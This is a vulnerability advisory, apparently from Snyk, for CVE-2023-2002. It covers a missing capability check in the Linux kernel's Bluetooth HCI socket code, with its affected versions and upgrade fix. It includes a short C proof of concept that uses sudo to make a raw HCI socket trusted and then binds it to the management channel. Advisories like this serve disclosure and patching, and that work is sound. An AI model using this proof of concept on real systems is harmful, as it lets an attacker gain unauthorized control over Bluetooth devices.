Execution with Unnecessary Privileges Affecting torvalds/linux package, versions [4.9,6.4-rc1)
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.04% (11th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-UNMANAGED-TORVALDSLINUX-5507220
- published 9 May 2023
- disclosed 16 Apr 2023
- credit Ruihan Li
Introduced: 16 Apr 2023
CVE-2023-2002 Open this link in a new tabHow to fix?
Upgrade torvalds/linux to version 6.4-rc1 or higher.
Overview
Affected versions of this package are vulnerable to Execution with Unnecessary Privileges due to a missing capability check in the net/bluetooth/hci_sock.c file. This flaw allows an attacker to unauthorized execution of management commands, compromising the confidentiality, integrity, and availability of Bluetooth communication.
PoC
int fd = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI);
/* By executing sudo with an HCI socket as stderr, an ioctl
* system call makes the HCI socket privileged (i.e. with
* the HCI_SOCK_TRUSTED flag set).
*/
int pid = fork();
if (pid == 0) {
dup2(fd, 2);
close(fd);
execlp("sudo", "sudo");
}
waitpid(pid, NULL, 0);
struct sockaddr_hci haddr;
haddr.hci_family = AF_BLUETOOTH;
haddr.hci_dev = HCI_DEV_NONE;
haddr.hci_channel = HCI_CHANNEL_CONTROL;
/* The socket has not been bound. It can be bound to the
* management channel now. After that, the HCI_SOCK_TRUSTED
* flag is still present, as it will indeed never be cleared.
*/
bind(fd, (struct sockaddr *)&haddr, sizeof(haddr));
References
CVSS Scores
version 3.1